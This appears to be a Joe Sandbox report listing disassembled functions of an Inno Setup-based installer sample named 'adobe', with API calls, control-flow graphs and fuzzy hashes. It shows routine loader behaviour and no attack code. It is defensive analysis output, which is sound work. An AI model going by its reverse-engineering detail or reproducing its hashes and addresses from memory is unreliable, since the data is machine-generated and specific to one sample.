                                                                                                                                                          Function 0040457C Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                                                                          • API String ID: 3256987805-3653653586
                                                                                                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040A0E7 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 111COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02297D18), ref: 0040966C
                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                          • SetWindowLongA.USER32(00020466,000000FC,00409918), ref: 0040A148
                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                          • 73A25CF0.USER32(00020466,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                          • API String ID: 3341979996-3001827809
                                                                                                                                                          • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                                                                                          • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                                                                                                          • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                                                                                          • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004090A4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                                                                          • API String ID: 1646373207-2130885113
                                                                                                                                                          • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                                                                                          • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                                                                                                          • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                                                                                          • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0040A0D5 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                                                                                          • SetWindowLongA.USER32(00020466,000000FC,00409918), ref: 0040A148
                                                                                                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                                                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000), ref: 00409A28
                                                                                                                                                            • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                            • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90), ref: 00409A5C
                                                                                                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                                                                                          • 73A25CF0.USER32(00020466,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                                                                          • API String ID: 978128352-3001827809
                                                                                                                                                          • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                                                                                          • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                                                                                                          • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                                                                                          • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004099A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77processCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000,00409A77), ref: 00409A14
                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90,00000000), ref: 00409A28
                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02297D18,00409A90), ref: 00409A5C
                                                                                                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02297D18), ref: 0040966C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                                                                          • String ID: D
                                                                                                                                                          • API String ID: 3356880605-2746444292
                                                                                                                                                          • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                                                                                          • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                                                                                                          • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                                                                                          • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401918 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 116 401918-40193a RtlInitializeCriticalSection 117 401946-40197c call 4012dc * 3 LocalAlloc 116->117 118 40193c-401941 RtlEnterCriticalSection 116->118 125 4019ad-4019c1 117->125 126 40197e 117->126 118->117 130 4019c3-4019c8 RtlLeaveCriticalSection 125->130 131 4019cd 125->131 127 401983-401995 126->127 127->127 129 401997-4019a6 127->129 129->125 130->131
                                                                                                                                                          APIs
                                                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 730355536-4052018393
                                                                                                                                                          • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                          • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                                                                          • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                                                                          • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00409E47 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117windowCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID: .tmp$y@
                                                                                                                                                          • API String ID: 2030045667-2396523267
                                                                                                                                                          • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                                                                                          • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                                                                                                          • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                                                                                          • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00409E62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113windowCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message
                                                                                                                                                          • String ID: .tmp$y@
                                                                                                                                                          • API String ID: 2030045667-2396523267
                                                                                                                                                          • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                                                                                          • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                                                                                          • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                                                                                          • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00409330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          APIs
                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateDirectoryErrorLast
                                                                                                                                                          • String ID: .tmp
                                                                                                                                                          • API String ID: 1375471231-2986845003
                                                                                                                                                          • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                                                                                          • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                                                                                          • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                                                                                          • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401430 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 277 401430-40143d 278 401446-40144c 277->278 279 40143f-401444 277->279 280 401452-40146a VirtualAlloc 278->280 279->280 281 40146c-40147a call 4012e4 280->281 282 40148f-401492 280->282 281->282 285 40147c-40148d VirtualFree 281->285 285->282
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                          • String ID: Z
                                                                                                                                                          • API String ID: 2087232378-4052018393
                                                                                                                                                          • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                          • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                          • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                          • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00407749 Relevance: 3.3, APIs: 2, Instructions: 284fileCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 346 407749-40774a 347 4076dc-4076e6 WriteFile 346->347 348 40774c-40776f 346->348 350 4076e8-4076ea call 40748c 347->350 351 4076ef-4076f2 347->351 349 407770-407785 348->349 354 407787 349->354 355 4077f9 349->355 350->351 352 407700-407704 351->352 353 4076f4-4076fb call 4073ec 351->353 353->352 358 40778a-40778f 354->358 359 4077fd-407802 354->359 360 40783b-40783d 355->360 361 4077fb 355->361 364 407803-407819 358->364 366 407791-407792 358->366 359->364 362 407841-407843 360->362 361->359 365 40785b-40785c 362->365 364->365 376 40781b 364->376 367 4078d6-4078eb call 407890 InterlockedExchange 365->367 368 40785e-40788c 365->368 369 407724-407741 366->369 370 407794-4077b4 366->370 391 407912-407917 367->391 392 4078ed-407910 367->392 384 407820-407823 368->384 387 407890-407893 368->387 373 407743 369->373 374 4077b5 369->374 370->374 379 407746-407747 373->379 380 4077b9 373->380 382 4077b6-4077b7 374->382 383 4077f7-4077f8 374->383 377 40781e-40781f 376->377 377->384 379->346 385 4077bb-4077cd 379->385 380->385 382->380 383->355 388 407824 384->388 389 407898 384->389 385->362 390 4077cf-4077d4 385->390 387->389 393 407825 388->393 394 40789a 388->394 389->394 390->360 398 4077d6-4077de 390->398 392->391 392->392 396 407896-407897 393->396 397 407826-40782d 393->397 399 40789f 394->399 396->389 400 4078a1 397->400 401 40782f 397->401 398->349 409 4077e0 398->409 399->400 406 4078a3 400->406 407 4078ac 400->407 403 407832-407833 401->403 404 4078a5-4078aa 401->404 403->360 403->377 408 4078ae-4078af 404->408 406->404 407->408 408->399 410 4078b1-4078bd 408->410 409->383 410->389 411 4078bf-4078c0 410->411
                                                                                                                                                          APIs
                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2904130184.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2904097480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904157155.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2904185962.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                          • Opcode ID: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                          • Instruction ID: ef7112967ca92329f6454244f41010afd6781152a6d2bd16d4b387d8db15cd6b
                                                                                                                                                          • Opcode Fuzzy Hash: 2dcb34b7253c06e6037fe4e1c91b55c1fb8a74294a45886a788786d1cab60b08
                                                                                                                                                          • Instruction Fuzzy Hash: F951D12294D2910FC7126B7849685A53FE0FE5331532E92FBC5C1AB1A3D27CA847D35B
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 412 401fd4-401fe6 413 401fe8 call 401918 412->413 414 401ffb-402010 412->414 418 401fed-401fef 413->418 416 402012-402017 RtlEnterCriticalSection 414->416 417 40201c-402025 414->417 416->417 419 402027 417->419 420 40202c-402032 417->420 418->414 423 401ff1-401ff6 418->423 419->420 421 402038-40203c 420->421 422 4020cb-4020d1 420->422 424 402041-402050 421->424 425 40203e 421->425 427 4020d3-4020e0 422->427 428 40211d-40211f call 401ee0 422->428 426 40214f-402158 423->426 424->422 431 402052-402060 424->431 425->424 429 4020e2-4020ea 427->429 430 4020ef-40211b call 402f54 427->430 436 402124-40213b 428->436 429->430 430->426 434 402062-402066 431->434 435 40207c-402080 431->435 438 402068 434->438 439 40206b-40207a 434->439 441 402082 435->441 442 402085-4020a0 435->442 444 402147 436->444 445 40213d-402142 RtlLeaveCriticalSection 436->445 438->439 443 4020a2-4020c6 call 402f54 439->443 441->442 442->443 443->426 445->444
                                                                                                                                                          APIs
                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                                                                            • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                                                                            • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
